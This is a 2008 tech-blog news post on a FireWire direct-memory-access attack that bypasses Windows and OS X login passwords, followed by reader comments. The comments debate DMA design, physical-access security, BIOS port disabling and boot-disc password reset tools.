Windows passwords easily bypassed over Firewire
All of the sudden we're starting to see more and more attacks take advantage of what's stored on your computer's RAM -- the latest, from New Zealand's Adam Boileau, allows an attacker to unlock Windows passwords in a just a few seconds using a Linux machine connected over Firewire. Unlike those disk encryption attacks we saw that required a reboot, Boileu's attack works while the target computer is running, tricking Windows into allowing full write access to RAM and then corrupting the password protection code. That's a little scary -- but other researchers say that it's not a traditional vulnerability, since direct memory access is a feature of Firewire. Still, we're sealing up all of our ports with Silly Putty starting today, that ought to stop 'em.Update: Apparently this has been demonstrated on OS X as well -- it looks like Firewire's direct memory access is the common vector here.
[Thanks, Drew]
Reader Comments (Page 1 of 2)
Ignatius @ Mar 4th 2008 1:47PM
Another reason why USB is superior. All hail USB 3.0's coming.
Phil Perman @ Mar 4th 2008 2:08PM
Although to be fair thats like saying your pc is harder to hack because it hasn't got a network card. Superiority through inferiority
josh @ Mar 4th 2008 2:13PM
"Although to be fair thats like saying your pc is harder to hack because it hasn't got a network card. Superiority through inferiority"
No, it's like saying your network shouldn't have direct memory access, which you, it shouldn't. Networking does not require DMA, there is no valid reason that one production machine should be able to directly access another production machine's memory (the operable word being production; if you are doing software development there are plenty of reasons that might be useful). Surprise surprise, that is a huge security risk and it always has been.
ujn @ Mar 4th 2008 2:27PM
But hey, DMA is done for perfomance. Cut DMA and yoor computer will die processing network trafficing!
rob @ Mar 4th 2008 2:35PM
You will be able to accomplish the same thing on a notebook with Cardbus or Expresscard (the PCI version), since the card can request a DMA and access all memory.
Kelmon @ Mar 4th 2008 3:42PM
"Another reason why USB is superior"
Another?
Raptor007 @ Mar 4th 2008 4:01PM
Ignatius was probably trying to choose "Ignoramus" as his name, but didn't know how to spell it properly.
Ignatius @ Mar 4th 2008 4:08PM
Wow. Flaming me by making a pun on my name? Yeah, that's the way to be cool.
Jon Doe. @ Mar 4th 2008 6:11PM
Yah meanwhile USB 2 is slow as shit for hard drive access. Sorry but I'll keep my FW800 drive and its stupidly fast transfer rates.
Kamokazi @ Mar 4th 2008 1:52PM
Hmm...I wonder if something similar can be performed on OSX? I thought I heard something about a MBP/PowerBook firewire exploit?
Quick Google turned up this: http://www.codeangel.org/article/crack_a_mac_with_firewire
I guess it's a major firewire problem...wonder if it affects Firewire 800 as well?
DJZeratul @ Mar 4th 2008 1:57PM
Did you know you could reset the administrator password on any mac by using the install DVD?
GASP!
Kamokazi @ Mar 4th 2008 2:15PM
No, I didn't. I only know the basics on OSX. While the demo just showed an admin password being changed, the possibilities are much more severe. But just like this one for Windows, it requires physical access to the computer...so it's not something to be overly concerned about.
josh @ Mar 4th 2008 2:15PM
the firewire specification (sorry IEEE 1394 spec) calls for DMA. Any system that implements direct memory access per the specification (so pretty much everybody) is susceptible to attacks that focus on direct memory access.
Jason @ Mar 4th 2008 3:27PM
If you have physical access to a Windows PC, you can literally do anything to it. It's just a matter of how quickly you can get it done. That Firewire approach sure is convenient though...
miko34 @ Mar 4th 2008 1:52PM
Silly Putty won't stop that. That's just silly. You're silly.
Ignatius @ Mar 4th 2008 2:00PM
Hammer'll do just fine.
Green @ Mar 4th 2008 2:12PM
Hi Grimey old buddy.
Aashish Jain @ Mar 4th 2008 2:17PM
Take a deep breath Grimey.. the high voltage wires _will_ kill you :)
jonouk @ Mar 4th 2008 6:11PM
take it you saw that episode tonight on c4? that is a legendary episode
Matt @ Mar 4th 2008 2:01PM
Or you could just disable the port in bios. Well of course unless your bios is feature thin then this could be a problem...
RoboDan @ Mar 4th 2008 4:03PM
Yay for Thinkpads and being able to disable ports!
Don't even try this on a Dell ;)
TheKillerDynamo @ Mar 4th 2008 2:03PM
How many PCs come with firewire now anyways? I know mine sure doesn't haven't, and most of the non-Macs I've seen around campus don't have it either. It seems like this attack might be a bit limited.
rob @ Mar 4th 2008 2:38PM
pretty much every notebook has Cardbus and/or Expresscard. Just slot in a Firewire adapter. Although admittedly (at least on windows) it will just be sitting there asking for a driver disk.
PeterF @ Mar 4th 2008 4:16PM
Are you serious? EVERY laptop I see has a firewire port.
The Dude @ Mar 4th 2008 6:32PM
I've got a Toshiba Satellite notebook (albeit it's labeled "iLink") and two HP desktops purchased in the past 3 years that have 2 firewire ports (1 in front, 1 in back). The thing is I have absolutely no firewire devices so I've disabled the ports since day 1.
pathogen @ Mar 4th 2008 2:06PM
In other news if you allow someone physical access to your computer they might steal it.
josh @ Mar 4th 2008 2:48PM
Arg, my reply to the follow up comments got dropped below. The gist of it was that while your ethernet chipset has DMA, your network through it does not. You have to trust the internal components of your system to work correctly. In firewire what you are saying is that you now trust external components to also behave correctly, which in the corporate world where insider attacks are very real, is a bad decision. In this case it is your network rather than your network controller that has DMA.
CraigJ @ Mar 4th 2008 2:53PM
Yeah, if someone busts into my house I have more to worry about than violation of my Firewire ports...
sully @ Mar 4th 2008 2:10PM
According to slashdot, Adam Boileau brought this to the attention of MS years ago. After nothing was done, he decided that the way to fix the problem was to free up his tool.
(Really trying hard not to be a microsoft hater)
josh @ Mar 4th 2008 2:23PM
That's a load of crap. It is a flaw in the very design of firewire, as originally authored by Apple. The primary difference between firewire and USB is that firewire does not require the CPU to control all of its actions. To get around needing the CPU as an arbiter for system access the specification specifically requires direct memory access. For a vendor to fail to implement DMA their implementation just won't work with any device expecting it, and MS would have been pounded for deviating from the standard (and get flamed for that).
This attack literally cannot be fixed without completely throwing out the current firewire spec and starting over (at which point, just use USB), and throwing out every device implemented to spec. The only thing MS can be blamed for is implementing an inherently insecure specification authored by someone else (it would never have made it through MS's SDL if written in house).
And to be clear, this attack is possible against any system that implements firewire. If this author was responsible he would have lobbied for the specification to be altered rather than a particular vendor implementing the specification to break compatability.
Neal @ Mar 4th 2008 2:25PM
Anytime Anyone has *physical* access to any machine, you will never have security. This is why servers that house critical data are in secure, lights out datacenters with guards on site 24/7, card readers, cameras present, palm readers, and bulletproof glass. Why would MS respond to something that is working as the specifications of the standard are working as intended?
Physical secutiry will always be a downfall in overall security, no amount of logical security will ever take it's place.
craig @ Mar 4th 2008 5:06PM
josh, you're changing your tune as your comments progress. At first you said that networking should not have DMA (which is laughably false), then said that ethernet had DMA but "the network" does not, and now say that the problem is the firewire's specification is inherently insecure.
DMA, specifically zero-copy, is the holy grail of networking. Without it, throughput will be capped. To implement zero-copy, not only do the devices need DMA but "the network" needs it, so DMA has every business being part of networking. The problem here is a crappy implementation of DMA in networking, not an example of why DMA shouldn't be part of it.
martin @ Mar 4th 2008 2:16PM
wont someone please think of the children?!
macona @ Mar 4th 2008 3:08PM
Firewire had children? Why wasnt I invited to the baby shower?
fistpittingnork @ Mar 4th 2008 2:16PM
Homemade boot cds with locksmith programs or password-changer on a flash drive sounds easier.
Dan @ Mar 4th 2008 6:47PM
good call dude. I use ERD commander's locksmith all the time... that program is the shit
TheAxMan @ Mar 4th 2008 2:17PM
Engadget, engadget, engadget. Stop taking stuff directly from Slashdot and posting it here -- don't you know they're rabid anti-MS fanboys?
This is a feature of Firewire. By design it allows direct access to the DMA controller, and this 'bug' is present in Linux, BSD, OS-X, Windows, !
So at least do a little reasearch before posting this stuff..
Blaktornado @ Mar 4th 2008 2:59PM
"don't you know they're rabid anti-MS fanboys?"
Isn't Engadget?
(Hint: Answer = no)
Oreynid @ Mar 4th 2008 2:20PM
This "exploit" requires physical access to the machine. Not to mention, that one could use a password reset utility to boot from and accomplish the same thing.
Firewire has direct memory access because it was designed that way. It also allows for faster sustained transfers between devices because the CPU doesn't have to be involved. I like my firewire...or wait IEEE 1394, and I have enough smarts to keep my computer in a safe place to not allow for physical access by unauthorized persons.
martin @ Mar 4th 2008 2:20PM
i dont need firewire because i'm homer simpson!
fistpittingnork @ Mar 4th 2008 2:28PM
Shhh, this is the internet, you're Mr. X.
Homeboy @ Mar 4th 2008 2:26PM
Last year I sent my laptop in for repair but just before It got picked up I changed the password. When I got it back I had no clue what the new password was. As frustrated as I was formating was not an option since it would take one or two days to download all ther software I need and get it setup properly. So I sat on my desktop, lurked around the net and found a surprisingly easy way to clear the password in Vista.
It involves downloading a 34MB software which is then burnt on to a bootable disc. Boot the computer from the disc and after a few button presses you have cleared the password. Although you can just clear or change it, you can't see what it was. But still, it's incredibly easy and may I say unsafe? I still have the disc and can get into pretty much every XP or Vista computer which is password protected.
redspear @ Mar 4th 2008 2:34PM
Well the same is true of OSX forget your password adn you can go ahead and boot a OSX install disc and then reset it.
Gorillamonk @ Mar 4th 2008 2:46PM
send me a link. my fam is forever forgetting their pass. And I'm sick and tired of reinstalling. hit my email
macserv @ Mar 4th 2008 3:01PM
That can't be accomplished quite as easily if you set an Open Firmware or EFI password. You'll need that password before you can boot off of any device (including the internal optical drive) other than your chosen startup volume.
With that in place, a Mac OS X system conforms to tighter security standards for workstation use, assuming the CPU itself is locked away safely.
redspear @ Mar 4th 2008 3:16PM
Macsev,
You just need to alter the amount of RAM at start up then or press Ctr-Option-P-R if it hasn't been disabled. Of course one of those requires access to the CPU.
Windows Machines are also capable of having a BIOS password as well and assuming the CPU is locked up tight and away you won't be able to change that through any external command I know of(Have to remove the battery or switch a jumper to set the BIOS to default.)
RoboDan @ Mar 4th 2008 4:03PM
Thank God for Thinkpads
ie. Startup password for mobo and hard drive encryption.
Yay security chip.
Old Dell computers did the same thing... except more poorly as they did not have a security chip and offered only a startup hard drive password.
crescentdavid @ Mar 4th 2008 2:31PM
Update: Apparently this has been demonstrated on OS X as well -- it looks like Firewire's direct memory access is the common vector here.
Apparently you've never heard of updating erroneous and misleading titles once folks with some real tech knowledge have set you straight.
Here, it's easy. I'll help! "Computer Passwords Easily Bypassed over Firewire." There, that wasn't so hard, was it? So get busy.
The Dude @ Mar 4th 2008 3:19PM
That's expecting entirely too much from this site.
bigdoggie @ Mar 4th 2008 2:31PM
*Buys a few Linux loaded EEE PCs..*
.Rawr! >:3